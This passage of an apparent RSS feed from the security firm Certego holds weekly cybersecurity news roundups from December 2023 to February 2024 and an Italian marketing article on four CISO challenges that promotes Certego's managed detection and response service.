&lt;p&gt;Compila il form per ricevere il Whitepaper e scoprire come prepararsi agli aggiornamenti sulla conformità previsti dalla Normativa DORA.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Weekly Highlights - February 9th]]></title><description><![CDATA[News and cybercrime updates selected by Certego]]></description><link>https://www.certego.net/blog/weekly-highlights-february-9/</link><guid isPermaLink="false">weekly-highlights-february-9</guid><category><![CDATA[Blog]]></category><pubDate>Thu, 08 Feb 2024 23:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;European Commission adopted the first European Cybersecurity Certification Scheme&lt;/h2&gt;
&lt;h3&gt;#Regulations&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;The European Cybersecurity Certification Scheme on Common Criteria (EUCC)&lt;/strong&gt; offers a set of rules to ensure trustworthiness in the life cycle of information and communications technology (ICT) products.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.enisa.europa.eu/news/an-eu-prime-eu-adopts-first-cybersecurity-certification-scheme&quot;&gt;click to read the article&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Most Linux systems exposed to complete compromise via shim vulnerability&lt;/h2&gt;
&lt;h3&gt;#Vulnerabilities&lt;/h3&gt;
&lt;p&gt;Tracked as &lt;strong&gt;CVE-2023-40547 (CVSS score: 9.8)&lt;/strong&gt;, the vulnerability could be exploited to achieve a Secure Boot bypass. &lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.securityweek.com/most-linux-systems-exposed-to-complete-compromise-via-shim-vulnerability/&quot;&gt;click to read the article&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;This week, CERT-AGID has identified and analyzed 22 malicious campaigns in the Italian scenario of its reference&lt;/h2&gt;
&lt;h3&gt;#Reports&lt;/h3&gt;
&lt;p&gt;21 campaigns had Italian targets and one general campaign that nonetheless affected Italy.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://cert-agid.gov.it/news/sintesi-riepilogativa-delle-campagne-malevole-nella-settimana-del-27-gennaio-2-febbraio-2024/&quot;&gt;click to read the article&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Record-breaking ransomware profits surpassed $1B in 2023&lt;/h2&gt;
&lt;h3&gt;#Reports&lt;/h3&gt;
&lt;p&gt;Says the new report from blockchain analytics firm Chainalysis.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.bankinfosecurity.com/record-breaking-ransomware-profits-surpassed-1b-in-2023-a-24300?&amp;#x26;web_view=true&quot;&gt;click to read the article&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;</content:encoded></item><item><title><![CDATA[CISO 2024]]></title><description><![CDATA[4 sfide cruciali per la cybersecurity e come superarle con successo]]></description><link>https://www.certego.net/blog/ciso-2024-4-sfide-cruciali-per-la-cybersecurity-e-come-superarle-con-successo/</link><guid isPermaLink="false">ciso-2024-4-sfide-cruciali-per-la-cybersecurity-e-come-superarle-con-successo</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Thu, 01 Feb 2024 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Summary&lt;/strong&gt;&lt;/p&gt;
&lt;ol start=&quot;0&quot;&gt;
&lt;li&gt;&lt;a href=&quot;#intro&quot;&gt;Introduzione&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#1&quot;&gt;Adottare un approccio adattivo alla cybersecurity&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#2&quot;&gt;Upgrade e semplificazione tecnologica&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#3&quot;&gt;Ottimizzazione delle risorse&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#4&quot;&gt;Compliance alle normative in materia di sicurezza informatica&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;&lt;a id=&quot;intro&quot;&gt;&lt;/a&gt; Introduzione&lt;/h2&gt;
&lt;p&gt;La cybersecurity è un elemento cruciale per la stabilità di ogni organizzazione, agendo come baluardo essenziale sia nella protezione contro le interruzioni delle attività operative che nella salvaguardia dell&apos;immagine aziendale. Una solida strategia di cybersecurity non solo previene le perdite economiche dirette dovute agli attacchi informatici, ma contribuisce anche a costruire e mantenere la fiducia dei clienti e dei partner commerciali, rafforzando la reputazione dell&apos;azienda.&lt;/p&gt;
&lt;p&gt;Oltre alla progressiva sofisticazione delle tecniche di attacco, anche l&apos;attuale contesto geopolitico, caratterizzato da instabilità e incertezza, sta favorendo l’espansione dei cybercriminali, che ora includono nel loro raggio di attacco anche settori aziendali prima ritenuti meno a rischio. In questo scenario, i CISO e i responsabili IT devono affrontare sfide più complesse e sono chiamati a prendere decisioni cruciali per il futuro delle loro organizzazioni.&lt;/p&gt;
&lt;p&gt;Per garantire sistemi di difesa in grado di resistere alle nuove minacce, i responsabili della sicurezza informatica sono chiamati a superare quattro sfide cruciali. Vediamole insieme.&lt;/p&gt;
&lt;br&gt;
&lt;h2&gt;&lt;a id=&quot;1&quot;&gt;&lt;/a&gt; 1. Adottare un approccio adattivo alla cybersecurity&lt;/h2&gt;
&lt;p&gt;Nella costante battaglia contro il cybercrime, l&apos;adattabilità è diventata un elemento cruciale per il successo nella difesa delle organizzazioni. Rispetto agli approcci di sicurezza tradizionali, basati principalmente su meccanismi di blocco e procedure post-evento, la sicurezza adattiva si basa sull&apos;utilizzo della Cyber Threat Intelligence per analizzare in modo esteso i comportamenti dei cybercriminali.&lt;/p&gt;
&lt;p&gt;La Cyber Threat Intelligence agisce come un radar costantemente attivo, che attraverso l’analisi su larga scala dei comportamenti degli attori malevoli, consente alle organizzazioni di rimanere costantemente aggiornati sull’evoluzione del panorama delle minacce cibernetiche. Invece di reagire solo dopo un attacco, le aziende possono adottare misure adattive per prevenirlo prima che si concretizzi!&lt;/p&gt;
&lt;p&gt;Questo approccio alla cybersecurity non solo offre una visione più profonda delle minacce più innovative, ma permette alle aziende di adattare e migliorare costantemente le proprie strategie di difesa, rendendole più robuste e in grado di affrontare efficacemente i rischi emergenti.&lt;/p&gt;
&lt;p&gt;L&apos;approccio adattivo alla cybersecurity si articola in diverse componenti:&lt;/p&gt;
&lt;h3&gt;Risposta rapida:&lt;/h3&gt;
&lt;p&gt;Grazie alla comprensione approfondita delle tattiche, delle tecniche e delle procedure (TTP) utilizzate dagli aggressori, le organizzazioni possono accelerare la loro capacità di risposta agli incidenti, riducendo significativamente il danno potenziale e ripristinando rapidamente le operazioni aziendali.&lt;/p&gt;
&lt;h3&gt;Decisioni basate sui dati:&lt;/h3&gt;
&lt;p&gt;La Cyber Threat Intelligence fornisce dati contestualizzati e analisi approfondite che aiutano i responsabili della sicurezza a prendere decisioni informate sulla protezione delle risorse critiche e sulla priorità delle risposte agli incidenti.&lt;/p&gt;
&lt;h3&gt;Personalizzazione della sicurezza:&lt;/h3&gt;
&lt;p&gt;L’approccio adattivo consente di personalizzare le misure di sicurezza in base al profilo di rischio specifico di un&apos;organizzazione, garantendo un utilizzo efficiente delle risorse per proteggere gli asset più critici.&lt;/p&gt;
&lt;h3&gt;Ottimizzazione degli investimenti in sicurezza:&lt;/h3&gt;
&lt;p&gt;Attraverso i dati di Intelligence, le organizzazioni possono ottimizzare gli investimenti in sicurezza, concentrando le risorse su soluzioni e procedure che offrono la massima protezione contro le minacce.&lt;/p&gt;
&lt;h3&gt;Riduzione dei costi associati agli incidenti di sicurezza:&lt;/h3&gt;
&lt;p&gt;Prevenendo gli attacchi e riducendo il tempo di risposta agli incidenti, le organizzazioni possono diminuire notevolmente i costi finanziari e di reputazione associati alle violazioni dei dati.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Grazie all’adozione di un approccio adattivo alla cybersecurity, le organizzazioni possono valutare costantemente il rischio a cui sono esposte e adottare misure di sicurezza adeguate alle nuove minacce e alle mutevoli necessità delle infrastrutture aziendali. Questo modello favorisce una comprensione approfondita dei livelli di sicurezza e promuove un miglioramento continuo basato sui dati, garantendo un elevato livello di sicurezza in un ambiente digitale in costante evoluzione&lt;/strong&gt;.&lt;/p&gt;
&lt;br&gt;
&lt;h2&gt;&lt;a id=&quot;2&quot;&gt;&lt;/a&gt; 2. Upgrade e semplificazione tecnologica&lt;/h2&gt;
&lt;p&gt;Negli ultimi anni, abbiamo assistito a un costante aumento del numero di dispositivi aziendali connessi alla rete, in parallelo con la crescente complessità dei sistemi informatici. Questa evoluzione ha spinto molte organizzazioni a implementare nel corso del tempo soluzioni di sicurezza specifiche per i diversi ambienti infrastrutturali, come ad esempio quelli on-premise, cloud, sistemi OT e i network.&lt;/p&gt;
&lt;p&gt;Oltre alla necessità di rafforzare la sicurezza, la semplificazione dei processi di gestione del rischio informatico è diventata cruciale. La gestione di diverse soluzioni di cybersecurity rappresenta una sfida per gli addetti alla sicurezza delle organizzazioni, che devono analizzare il traffico e correlare i dati provenienti da diverse fonti.&lt;/p&gt;
&lt;p&gt;Le soluzioni di cybersecurity più moderne superano questa sfida consentendo alle organizzazioni di unificare il monitoraggio dei vari ambienti infrastrutturali all&apos;interno di un’unica piattaforma e orchestrare anche le attività di analisi e risposta degli incidenti in una sola console, riducendo la complessità derivante dall’utilizzo di molteplici soluzioni di diversi fornitori.&lt;/p&gt;
&lt;p&gt;L&apos;utilizzo di una singola soluzione per la gestione end-to-end della sicurezza informatica rappresenta un notevole vantaggio per qualsiasi azienda, consentendo di valutare in maniera più chiara i livelli di sicurezza e di reagire rapidamente agli eventuali attacchi informatici.&lt;/p&gt;
&lt;p&gt;Una moderna piattaforma di cybersecurity in grado unificare tutte le operazioni di Monitoring, Detection &amp;#x26; Response in un’unica console, presenta numerosi vantaggi rispetto all’adozione di più soluzioni:&lt;/p&gt;
&lt;h3&gt;Tempi di rilevazione e risposta ridotti:&lt;/h3&gt;
&lt;p&gt;La capacità di monitorare e analizzare i dati di sicurezza in un&apos;unica piattaforma consente di identificare e rispondere agli incidenti di sicurezza più rapidamente, riducendo il tempo di esposizione alle minacce.&lt;/p&gt;
&lt;h3&gt;Visione olistica:&lt;/h3&gt;
&lt;p&gt;Fornisce una visione completa e unificata delle minacce e delle vulnerabilità in tutti gli ambienti infrastrutturali, consentendo una comprensione più profonda e integrata dei rischi di sicurezza.&lt;/p&gt;
&lt;h3&gt;Analisi avanzata:&lt;/h3&gt;
&lt;p&gt;L&apos;integrazione dei dati di sicurezza in una piattaforma unificata permette l&apos;uso di tecnologie avanzate di analisi, come l&apos;intelligenza artificiale (AI) e l&apos;apprendimento automatico (ML), per identificare schemi complessi e prevedere potenziali minacce con maggiore precisione.&lt;/p&gt;
&lt;h3&gt;Scalabilità:&lt;/h3&gt;
&lt;p&gt;Una soluzione unificata può essere più facilmente scalata per adattarsi alla crescita dell&apos;organizzazione e all&apos;evoluzione del paesaggio delle minacce, senza la necessità di integrare continuamente nuovi strumenti.&lt;/p&gt;
&lt;h3&gt;Efficienza operativa:&lt;/h3&gt;
&lt;p&gt;L&apos;utilizzo di un&apos;unica soluzione riduce la complessità operativa e i costi associati alla gestione di più strumenti. Questo si traduce in una maggiore efficienza operativa e in una riduzione degli oneri amministrativi per il personale IT e di sicurezza.&lt;/p&gt;
&lt;h3&gt;Migliore collaborazione:&lt;/h3&gt;
&lt;p&gt;Favorisce una migliore collaborazione tra i team di cybersecurity e altre funzioni IT, poiché tutti possono accedere e lavorare con le stesse informazioni e strumenti.&lt;/p&gt;
&lt;h3&gt;Coerenza dele politiche di sicurezza:&lt;/h3&gt;
&lt;p&gt;Facilita l&apos;implementazione di politiche e procedure di sicurezza coerenti in tutta l&apos;organizzazione, migliorando la gestione dei rischi e la compliance.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;L’adozione di una soluzione unificata per le attività di Monitoraggio, Analisi e Risposta migliora l&apos;efficacia della protezione, semplifica la gestione dei rischi e consente una risposta più rapida agli incidenti, offrendo notevoli vantaggi rispetto all&apos;utilizzo di soluzioni separate&lt;/strong&gt;.&lt;/p&gt;
&lt;br&gt;
&lt;h2&gt;&lt;a id=&quot;3&quot;&gt;&lt;/a&gt; 3. Ottimizzazione delle risorse&lt;/h2&gt;
&lt;p&gt;L&apos;incremento dei rischi informatici richiede un ampliamento del personale di sicurezza, ma le difficoltà nel formare un team esperto interno e la carenza di risorse qualificate rappresentano sfide significative per i CISO. In questo contesto, l’adozione di un servizio di Managed Detection &amp;#x26; Response si rivela una soluzione efficace, offrendo accesso a tecnologie avanzate e a professionisti altamente qualificati nella gestione delle minacce, senza i costi associati alla formazione e al mantenimento di un team interno. Questi vantaggi si traducono in diversi aspetti chiave che delineano il valore aggiunto di un servizio MDR per le aziende:&lt;/p&gt;
&lt;h3&gt;Esperti dedicati di sicurezza:&lt;/h3&gt;
&lt;p&gt;I servizi di MDR offrono team specializzati nelle attività di analisi, rilevamento e risposta, eliminando la necessità di investimenti formativi interni.&lt;/p&gt;
&lt;h3&gt;Risposta rapida alle minacce:&lt;/h3&gt;
&lt;p&gt;Con una reattività immediata, i servizi di Managed Detection &amp;#x26; Response consentono di minimizza i danni potenziali, proteggendo la continuità aziendale.&lt;/p&gt;
&lt;h3&gt;Copertura Continua:&lt;/h3&gt;
&lt;p&gt;Monitoraggio e protezione 24/7 assicurano una difesa costante, superando i limiti delle risorse interne.&lt;/p&gt;
&lt;h3&gt;Riduzione dei Costi:&lt;/h3&gt;
&lt;p&gt;La scelta dei servizi MDR è economicamente vantaggiosa rispetto alla creazione di un&apos;infrastruttura di sicurezza interna.&lt;/p&gt;
&lt;h3&gt;Reportistica più efficace:&lt;/h3&gt;
&lt;p&gt;Forniscono reportistica dettagliata per adattare i servizi di difesa alle nuove necessità.&lt;/p&gt;
&lt;h3&gt;Focus sul core business:&lt;/h3&gt;
&lt;p&gt;Consentono ai reparti IT aziendali di avere più tempo da dedicare alle attività più strettamente correlata al business aziendale.&lt;/p&gt;
&lt;h3&gt;Scalabilità:&lt;/h3&gt;
&lt;p&gt;I servizi MDR si adattano alle esigenze in evoluzione dell’organizzazione&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;I servizi di Managed Detection &amp;#x26; Response migliorano la sicurezza informatica aziendale attraverso una gestione delle risorse più efficiente, l’accesso a competenze altamente specializzate, tecnologie avanzate e una protezione continua&lt;/strong&gt;.&lt;/p&gt;
&lt;br&gt;
&lt;h2&gt;&lt;a id=&quot;4&quot;&gt;&lt;/a&gt; 4. Compliance alle normative in materia di sicurezza informatica&lt;/h2&gt;
&lt;p&gt;Nell&apos;epoca dell&apos;interconnessione crescente, il rischio di violazioni dei dati non è più solo una questione economica, ma ha acquisito una rilevanza sociale e politica significativa.&lt;/p&gt;
&lt;p&gt;Questa realtà ha spinto l&apos;adozione di normative nel campo della sicurezza informatica, tra cui il DORA, NIS2, il Cyber Resilience Act e il regolamento europeo sulla cybersecurity. Per le aziende, la conformità a tali normative è diventata essenziale non solo per evitare sanzioni, ma anche per rafforzare la fiducia dei clienti e delle autorità.&lt;/p&gt;
&lt;p&gt;In questo contesto, le organizzazioni sono chiamate non solo a implementare soluzioni tecnologiche specifiche, ma anche a adottare servizi e tecnologie in grado di gestire l&apos;intero ciclo di vita di un incidente e di fornire una reportistica dettagliata in merito a tali incidenti. In particolare, una piattaforma tecnologica per la gestione delle attività di Detection &amp;#x26; Response assume un ruolo cruciale, consentendo alle aziende di conformarsi alle normative vigenti e di sviluppare una strategia di sicurezza ben strutturata, fornendo al contempo un quadro completo per la gestione degli incidenti di sicurezza.&lt;/p&gt;
&lt;br&gt;
&lt;h3&gt;Certego MDR: la soluzione completa per le nuove sfide di Cybersecurity:&lt;/h3&gt;
&lt;p&gt;I servizi Certego di Managed Detection &amp;#x26; Response vengono erogati attraverso la piattaforma proprietaria o PanOptikon che abilita le attività di monitoraggio in tempo reale, analisi e risposta degli incidenti, oltre all’interazione diretta tra il team IT del cliente e il Detection &amp;#x26; Response team di Certego.&lt;/p&gt;
&lt;p&gt;La piattaforma utilizza un approccio modulare per adattarsi all&apos;infrastruttura dell&apos;organizzazione e scalare in base alle nuove necessità.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.certego.net/platform/security-operations-platform/&quot;&gt;Scopri come superare le 4 sfide cruciali della cybersecurity con la piattaforma PanOptikon e i servizi MDR di Certego&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Weekly Highlights - January 26th]]></title><description><![CDATA[News and cybercrime updates selected by Certego]]></description><link>https://www.certego.net/blog/weekly-highlights-january-26/</link><guid isPermaLink="false">weekly-highlights-january-26</guid><category><![CDATA[Blog]]></category><pubDate>Thu, 25 Jan 2024 23:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;HPE says hackers had access to emails for 6 months&lt;/h2&gt;
&lt;h3&gt;#Vulnerabilities&lt;/h3&gt;
&lt;p&gt;Hewlett Packard Enterprise revealed that its cloud email environment was targeted by hackers believed to be sponsored by the Russian government.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.securityweek.com/hpe-says-russian-government-hackers-had-access-to-emails-for-6-months/&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Hackers start exploiting critical Atlassian Confluence RCE flaw&lt;/h2&gt;
&lt;h3&gt;#Vulnerabilities&lt;/h3&gt;
&lt;p&gt;The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added an Atlassian Confluence Data Center and Server Template Injection bug, tracked as CVE-2023-22527, to its Known Exploited Vulnerabilities (KEV) catalog.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/hackers-start-exploiting-critical-atlassian-confluence-rce-flaw/?&amp;#x26;web_view=true&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Over 5.300 GitLab servers exposed to zero-click account takeover attacks&lt;/h2&gt;
&lt;h3&gt;#Vulnerabilities&lt;/h3&gt;
&lt;p&gt;Internet-exposed GitLab instances are vulnerable to CVE-2023-7028, a zero-click account takeover flaw GitLab warned about earlier this month.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/over-5-300-gitlab-servers-exposed-to-zero-click-account-takeover-attacks/&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;World Economic Forum has unveiled the &quot;Global Cybersecurity Outlook 2024&quot;&lt;/h2&gt;
&lt;h3&gt;#Reports&lt;/h3&gt;
&lt;p&gt;The report offers an in-depth look at the cybersecurity trends that will shape the future of economies and societies in the coming year.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.weforum.org/publications/global-cybersecurity-outlook-2024/&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Italy - CERT-AGID&lt;/h2&gt;
&lt;h3&gt;#Reports&lt;/h3&gt;
&lt;p&gt;CERT-AGID published the summary of malicious campaigns in Italy during the week of January 13 – 19, 2024.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://cert-agid.gov.it/news/sintesi-riepilogativa-delle-campagne-malevole-nella-settimana-del-13-19-gennaio-2024/&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;</content:encoded></item><item><title><![CDATA[Weekly Highlights - January 19th]]></title><description><![CDATA[News and cybercrime updates selected by Certego]]></description><link>https://www.certego.net/blog/weekly-highlights-january-19/</link><guid isPermaLink="false">weekly-highlights-january-19</guid><category><![CDATA[Blog]]></category><pubDate>Thu, 18 Jan 2024 23:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Ivanti Connect Secure zero-days now under mass exploitation&lt;/h2&gt;
&lt;h3&gt;#Vulnerabilities&lt;/h3&gt;
&lt;p&gt;Two zero-day vulnerabilities affecting Ivanti&apos;s Connect Secure VPN and Policy Secure network access control (NAC) appliances are now under mass exploitation.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/ivanti-connect-secure-zero-days-now-under-mass-exploitation/&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;ENISA and the members of the EU CSIRT network are monitoring the disclosed vulnerability on Ivanti Pulse Secure devices&lt;/h2&gt;
&lt;h3&gt;#Vulnerabilities&lt;/h3&gt;
&lt;p&gt;All the advisories published for the European CSIRT network members are available on GitHub.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://github.com/enisaeu/CNW/blob/main/advisories/2024/CVE-2023-46805_CVE-2024-21887_Ivanti-Secure-Gateways.md&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Turkish Cyberspies Targeting Netherlands&lt;/h2&gt;
&lt;h3&gt;#Cyber Espionage&lt;/h3&gt;
&lt;p&gt;Turkish state-sponsored group Sea Turtle has been targeting multiple organizations in the Netherlands for espionage.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.securityweek.com/turkish-cyberspies-targeting-netherlands/&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;ECSO has announced the upcoming release of the updated white paper regarding the NIS2 implementation&lt;/h2&gt;
&lt;h3&gt;#Regulations&lt;/h3&gt;
&lt;p&gt;Turkish state-sponsored group Sea Turtle has been targeting multiple organizations in the Netherlands for espionage.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://ecs-org.eu/ecso-to-lead-development-of-a-white-paper-as-part-of-the-nis2-implementation-initiative/&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;New calls for proposals under the Digital Europe Programme&lt;/h2&gt;
&lt;h3&gt;#European Union&lt;/h3&gt;
&lt;p&gt;Released initiatives aimed at developing cyber projects within the scope of the European Cybersecurity Competence Centre (ECCC)&apos;s mission.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.acn.gov.it/notizie/contenuti/cybersicurezza-nuovi-bandi-digital-europe-programme&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;</content:encoded></item><item><title><![CDATA[Weekly Highlights - January 12th]]></title><description><![CDATA[News and cybercrime updates selected by Certego]]></description><link>https://www.certego.net/blog/weekly-highlights-january-12/</link><guid isPermaLink="false">weekly-highlights-january-12</guid><category><![CDATA[Blog]]></category><pubDate>Thu, 11 Jan 2024 23:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;European Union Regulation on cybersecurity&lt;/h2&gt;
&lt;h3&gt;#Regulations&lt;/h3&gt;
&lt;p&gt;On January 7, the new European Union Regulation on cybersecurity came into effect, introducing provisions aimed at ensuring a higher and shared level of cybersecurity for institutions, legislative bodies, and entities of the Union.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://ec.europa.eu/commission/presscorner/detail/en/ip_23_6782&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;AGID&lt;/h2&gt;
&lt;h3&gt;#Reports&lt;/h3&gt;
&lt;p&gt;AGID (Agenzia per l’Italia digitale) has published the report on malicious campaigns that targeted Italy in 2023.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://cert-agid.gov.it/news/report-riepilogativo-sullandamento-delle-campagne-malevole-che-hanno-interessato-litalia-nel-2023/&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;NIST&lt;/h2&gt;
&lt;h3&gt;#Artificial Intelligence&lt;/h3&gt;
&lt;p&gt;NIST highlights the importance of cybersecurity challenges associated with the rapid implementation of Artificial Intelligence systems.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://thehackernews.com/2024/01/nist-warns-of-security-and-privacy.html?&amp;#x26;web_view=true&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;CISA&lt;/h2&gt;
&lt;h3&gt;#Vulnerabilities&lt;/h3&gt;
&lt;p&gt;The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added six security vulnerabilities to the Known Exploited Vulnerabilities (KEV) catalog.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://thehackernews.com/2024/01/cisa-flags-6-vulnerabilities-apple.html?&amp;#x26;web_view=true&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;</content:encoded></item><item><title><![CDATA[Weekly Highlights - December 22nd]]></title><description><![CDATA[News and cybercrime updates selected by Certego]]></description><link>https://www.certego.net/blog/weekly-highlights-december-22/</link><guid isPermaLink="false">weekly-highlights-december-22</guid><category><![CDATA[Blog]]></category><pubDate>Thu, 21 Dec 2023 23:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Google fixes 8th Chrome zero-day exploited in attacks this year&lt;/h2&gt;
&lt;h3&gt;#Vulnerabilities&lt;/h3&gt;
&lt;p&gt;Google has released emergency updates to fix another Chrome zero-day vulnerability exploited in the wild, the eighth patched since the start of the year.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/google-fixes-8th-chrome-zero-day-exploited-in-attacks-this-year/&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;ALPHV/BlackCat&lt;/h2&gt;
&lt;h3&gt;#Threat Actors&lt;/h3&gt;
&lt;p&gt;The ALPHV/BlackCat ransomware gang has made over $300 million in ransom payments from more than 1,000 victims worldwide as of September 2023, according to the Federal Bureau of Investigation (FBI).&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/fbi-alphv-ransomware-raked-in-300-million-from-over-1-000-victims/&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Law enforcement seizes ALPHV/Blackcat sites, offers decryptor to victims&lt;/h2&gt;
&lt;h3&gt;#Threat Actors&lt;/h3&gt;
&lt;p&gt;The US Justice Department announced today a disruption campaign against the Blackcat/ALPHV ransomware group and let victims know that there is a decryptor they can use.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.helpnetsecurity.com/2023/12/19/alphv-blackcat-decryptor/&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;8220 gang exploits old Oracle WebLogic vulnerability to deliver infostealers, cryptominers&lt;/h2&gt;
&lt;h3&gt;#Threat Actors&lt;/h3&gt;
&lt;p&gt;Active since 2017, the 8220 gang has been known for deploying cryptocurrency miners on Linux and Windows hosts by exploiting known vulnerabilities.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.helpnetsecurity.com/2023/12/20/8220-oracle-weblogic-vulnerability/&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;The “2023 CWE Top 10 KEV Weaknesses” list, which lists the top ten CWEs in the Cybersecurity and Infrastructure Security Agency’s (CISA) “Known Exploited Vulnerabilities (KEV) Catalog,” is now available&lt;/h2&gt;
&lt;h3&gt;#Research&lt;/h3&gt;
&lt;p&gt;This list, providing additional information that organizations can use in their efforts to mitigate risk, was announced by the Homeland Security Systems Engineering and Development Institute. It is sponsored by the Department of Homeland Security and operated by the non-profit MITRE.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://cwe.mitre.org/top25/archive/2023/2023_kev_list.html&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;ACN (Agenzia per la Cybersicurezza Nazionale) has published the Guidelines on password storage&lt;/h2&gt;
&lt;h3&gt;#Research&lt;/h3&gt;
